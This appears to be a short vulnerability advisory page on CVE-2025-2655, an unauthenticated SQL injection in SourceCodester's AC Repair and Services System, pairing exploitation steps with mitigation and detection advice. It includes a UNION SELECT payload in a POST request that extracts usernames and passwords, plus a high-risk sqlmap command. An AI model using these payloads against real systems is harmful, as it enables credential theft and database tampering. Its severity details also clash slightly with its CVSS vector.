SourceCodester AC Repair and Services System 10, SQL Injection, CVE-2025-2655 (Critical)

By /

Listen to this Post

The CVE-2025-2655 vulnerability in SourceCodester AC Repair and Services System 1.0 allows remote attackers to execute arbitrary SQL queries via the `ID` parameter in the `save_users` function within /classes/Users.php. This occurs due to improper input sanitization, enabling malicious actors to manipulate database operations. The flaw is exploitable without authentication, making it critical. Attackers can extract, modify, or delete sensitive data, including admin credentials. The vulnerability stems from direct concatenation of user-supplied input into SQL statements, bypassing prepared statements or parameterized queries. Public exploit scripts leverage this weakness by injecting crafted payloads into the `ID` field, triggering unauthorized database access.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation:

  1. Craft a malicious HTTP POST request to /classes/Users.php: 
    POST /classes/Users.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=save_users&ID=1' UNION SELECT 1,username,password,4 FROM users--

2. Use automated tools like `sqlmap`:

sqlmap -u "http://target.com/classes/Users.php?action=save_users&ID=1" --risk=3 --level=5

Mitigation:

1. Patch the `save_users` function with prepared statements:

$stmt = $conn->prepare("UPDATE users SET username=?, email=? WHERE id=?");
$stmt->bind_param("ssi", $_POST['username'], $_POST['email'], $_POST['ID']);

2. Implement input validation:

if (!is_numeric($_POST['ID'])) { die("Invalid ID"); }

3. Apply WAF rules to block SQLi patterns:

location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1000,deny,status:403"';
}

Analytics:

  • Attack Vector: Remote, unauthenticated
  • Impact: Data exfiltration, system compromise
  • CVSS 4.0: AV:N/AC:L/PR:N/UI:N/VC:L/VI:L/VA:L
  • Exploit Availability: Public

Detection:

grep -r "save_users.ID" /var/www/html/classes/

References:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top